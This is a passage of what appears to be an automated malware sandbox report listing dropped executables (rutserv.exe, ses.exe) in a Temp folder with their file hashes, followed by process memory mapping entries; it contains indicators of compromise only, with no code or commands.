SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeFilesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeFilesize
5.8MB
MD59a9cad56988e3c52f154187752ef453e
SHA10f9cf3a9cf3d030694179437df7502937cc15cff
SHA256e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA5122dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
C:\Users\Admin\AppData\Local\Temp\ses.exeFilesize
46KB
MD5771c4d6a2b4419d6598ec589a54212f5
SHA1445f2be41589b527f643b09bf6a86ba88fd00b95
SHA256942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226
SHA512f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8
-
C:\Users\Admin\AppData\Local\Temp\ses.exeFilesize
46KB
MD5771c4d6a2b4419d6598ec589a54212f5
SHA1445f2be41589b527f643b09bf6a86ba88fd00b95
SHA256942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226
SHA512f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8
-
memory/652-134-0x0000000000000000-mapping.dmp
-
memory/800-141-0x0000000000000000-mapping.dmp
-
memory/952-146-0x0000000000000000-mapping.dmp
-
memory/1048-152-0x0000000000000000-mapping.dmp
-
memory/1656-159-0x0000000000000000-mapping.dmp
-
memory/1684-175-0x0000000000000000-mapping.dmp
-
memory/3048-166-0x0000000000000000-mapping.dmp
-
memory/3364-165-0x0000000000000000-mapping.dmp
-
memory/3552-171-0x0000000000000000-mapping.dmp
-
memory/3624-151-0x0000000000000000-mapping.dmp
-
memory/3684-161-0x0000000000000000-mapping.dmp
-
memory/3704-154-0x0000000000000000-mapping.dmp
-
memory/3764-149-0x0000000000000000-mapping.dmp
-
memory/4064-172-0x0000000000000000-mapping.dmp
-
memory/4092-150-0x0000000000000000-mapping.dmp
-
memory/4116-132-0x0000000000000000-mapping.dmp
-
memory/4220-168-0x0000000000000000-mapping.dmp
-
memory/4264-145-0x0000000000000000-mapping.dmp
-
memory/4424-167-0x0000000000000000-mapping.dmp
-
memory/4748-164-0x0000000000000000-mapping.dmp
-
memory/4824-162-0x0000000000000000-mapping.dmp
-
memory/4840-153-0x0000000000000000-mapping.dmp
-
memory/4988-147-0x0000000000000000-mapping.dmp
-
memory/4996-163-0x0000000000000000-mapping.dmp
-
memory/5036-157-0x0000000000000000-mapping.dmp
-
memory/5092-148-0x0000000000000000-mapping.dmp
-
memory/5116-143-0x0000000000000000-mapping.dmp